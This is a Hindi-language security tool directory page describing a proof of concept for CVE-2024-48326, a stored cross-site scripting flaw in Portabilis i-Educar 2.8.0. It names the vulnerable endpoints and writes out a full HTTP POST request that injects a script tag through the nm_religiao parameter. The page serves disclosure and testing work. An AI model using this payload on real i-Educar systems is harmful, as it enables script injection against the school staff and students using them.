Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-48326 — Portabilis i-Educar v2.8.0 में nm_religiao पैरामीटर के माध्यम से संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता के लिए अवधारणा-प्रमाण शोषण, जो अप्रमाणित दूरस्थ JavaScript इंजेक्शन को सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/fabiobsj/cve-2024-48326
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubfabiobsj/cve-2024-48326

CVE-2024-48326

Portabilis i-Educar v2.8.0 में nm_religiao पैरामीटर के माध्यम से संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता के लिए अवधारणा-प्रमाण शोषण, जो अप्रमाणित दूरस्थ JavaScript इंजेक्शन को सक्षम करता है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-48326

विवरण: Portabilis i-Educar v2.8.0 Cross-Site Scripting (XSS) के लिए असुरक्षित है, जो POST अनुरोध में /intranet/educar_religiao_cad.php पर nm_religiao पैरामीटर के माध्यम से और GET अनुरोध में /intranet/educar_religiao_lst.php?busca=S&nm_religiao= पर ट्रिगर होता है। यह एक अप्रमाणित दूरस्थ हमलावर को दुर्भावनापूर्ण JavaScript इंजेक्ट करने की अनुमति देता है, जो डेटा देखे जाने पर निष्पादित होगी, संभावित रूप से अनधिकृत कार्रवाइयों या डेटा लीक का कारण बन सकती है।

संस्करण: Portabilis i-Educar 2.8.0 में खोजा गया।

प्रूफ ऑफ कॉन्सेप्ट

भेद्यता विवरण

समस्या educar_religiao_cad.php फ़ाइल के nm_religiao पैरामीटर में होती है, जो अस्वच्छित उपयोगकर्ता इनपुट को संग्रहीत करने और बाद में पेज लोड होने पर JavaScript के रूप में निष्पादित करने की अनुमति देती है।

प्रभावित घटक:

/intranet/educar_religiao_cad.php में nm_religiao पैरामीटर उपयोगकर्ता इनपुट को ठीक से स्वच्छ नहीं करता है, जिससे संग्रहीत XSS की अनुमति मिलती है। जब कोई हमलावर JavaScript इंजेक्ट करता है, तो यह डेटा तक पहुँचने पर निष्पादित होता है।

हेरफेर का उदाहरण:

root@kitploit:~
POST /intranet/educar_religiao_cad.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/intranet/educar_religiao_cad.php
Cookie: i_educar_session=1eqkHtEgzh7xrusxYcQ3AkZeRRjRMJlhTtib1n8J
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

tipoacao=Novo&cod_religiao=&nm_religiao=<script>alert("CVE")</script>

पुनरुत्पादन के चरण

  • इनपुट
  • ट्रिगर
टूल डाउनलोड करें